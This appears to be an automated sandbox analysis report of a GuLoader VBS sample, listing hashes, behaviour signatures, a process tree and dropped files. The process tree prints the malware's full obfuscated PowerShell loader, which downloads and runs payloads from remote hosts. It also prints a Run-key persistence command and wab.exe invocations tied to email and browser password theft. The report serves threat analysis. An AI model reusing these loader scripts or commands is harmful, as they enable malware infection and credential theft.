Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-07-2024 01:03

General

  • Target

    0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs

  • Size

    101KB

  • MD5

    20d1961bd8aa051dfb5632bf9be3e084

  • SHA1

    75aafde8ec0657db8c60570c12620e0b7072f552

  • SHA256

    0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2

  • SHA512

    3a362c2598bdacbb574b2663fac8679a52f84b158e405c2a44581fe45537e05bf09c2d41bb68848d64c419683810c6fa5bb17d8dd04bdc67ab0c4ef53188534f

  • SSDEEP

    3072:p4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvaiIu:Ot7SPReHd0WoT28faa+CS64mu8IQCtv1

Malware Config

Signatures

  • GuLoader, CloudEyE

    A shellcode-based downloader, first seen in 2020.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry; likely used as a geofence check.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with the connected storage and/or optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. 
,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. 
CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3272
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"
        3⤵
          PID:2752
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. 
,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. 
CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:552
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"
            4⤵
              PID:5108
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4744
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "forvrrende" /t REG_EXPAND_SZ /d "%Diplococci% -w 1 $Phytosaur=(Get-ItemProperty -Path 'HKCU:\Bortslbning\').epidermoid;%Diplococci% ($Phytosaur)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3620
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "forvrrende" /t REG_EXPAND_SZ /d "%Diplococci% -w 1 $Phytosaur=(Get-ItemProperty -Path 'HKCU:\Bortslbning\').epidermoid;%Diplococci% ($Phytosaur)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2240
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uzjxuibktmqxjtpqtthxusrdcomd"
                5⤵
                  PID:1628
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uzjxuibktmqxjtpqtthxusrdcomd"
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3636
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xbohvamdhuiklalucetqffduldwetne"
                  5⤵
                  • Accesses Microsoft Outlook accounts
                  PID:1676
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Forfrelsens.vbs"
                  5⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:832
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                    6⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4052
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                      7⤵
                        PID:2844
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                        7⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3860
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                          8⤵
                            PID:2696
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hvbawtxfvcapvgzyuposikylmjnnmycnnr"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:448

            Network

            MITRE ATT&CK Enterprise v15


            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Filesize

              53KB

              MD5

              d4d8cef58818612769a698c291ca3b37

              SHA1

              54e0a6e0c08723157829cea009ec4fe30bea5c50

              SHA256

              98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

              SHA512

              f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              d4ff23c124ae23955d34ae2a7306099a

              SHA1

              b814e3331a09a27acfcd114d0c8fcb07957940a3

              SHA256

              1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

              SHA512

              f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

            • C:\Users\Admin\AppData\Local\Temp\Forfrelsens.vbs

              Filesize

              26KB

              MD5

              7a6e4c385a470b962384797f26bc0b8a

              SHA1

              5d4eeeef8961f0ca7a83b5baeb36bb6715d61a11

              SHA256

              b13926e222564a63a3308de6cb116c226e93cd1e9d1b5f2fcac2de6d80e70206

              SHA512

              ba326cbba71bbfd6054a1f3564fcf4c085add37c186170e039e9cf469cdd16b0fd394f028d4d09ea45faadeea4cf5f4edb64f8c5db58eb67ed93987740d8e453

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_irxkunvh.yz0.ps1

              Filesize

              60B

              MD5

